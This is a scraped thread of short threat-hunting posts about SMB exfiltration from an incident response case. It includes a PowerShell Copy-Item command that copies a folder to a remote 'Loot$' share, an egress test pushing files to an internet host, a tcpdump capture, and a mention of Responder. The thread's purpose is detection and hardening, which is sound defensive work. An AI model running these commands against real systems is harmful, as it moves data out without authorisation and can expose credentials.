1/ #ThreatHunting
Another one for the people who monitor PowerShell logs or command lines:
Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse
This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
Another one for the people who monitor PowerShell logs or command lines:
Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse
This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
2/ Of course, outgoing SMB traffic must be allowed on the firewall(s).
#Hardening: Using Velociraptor's PowerShell Hunt, we can run the following command on defined (or all) hosts on the network:
Copy-Item -Path "C:\Temp\" -Destination "\142.93.X.X\c$"
#Hardening: Using Velociraptor's PowerShell Hunt, we can run the following command on defined (or all) hosts on the network:
Copy-Item -Path "C:\Temp\" -Destination "\142.93.X.X\c$"
3/ On our specified endpoint on the Internet (with the
-Destination parameter), we can capture incoming SMB connections (again, if SMB is not blocked on the FW):
# tcpdump -i eth0 port 445 -nn
IP X.X.X.20.64516 > 142.93.X.X.445
-Destination parameter), we can capture incoming SMB connections (again, if SMB is not blocked on the FW):
# tcpdump -i eth0 port 445 -nn
IP X.X.X.20.64516 > 142.93.X.X.445
4/ Or we can start Responder and show the customer the impact if outgoing SMB (TCP/445) is not blocked on the firewall. 
• • •
Missing some Tweet in this thread? You can try to
force a refresh
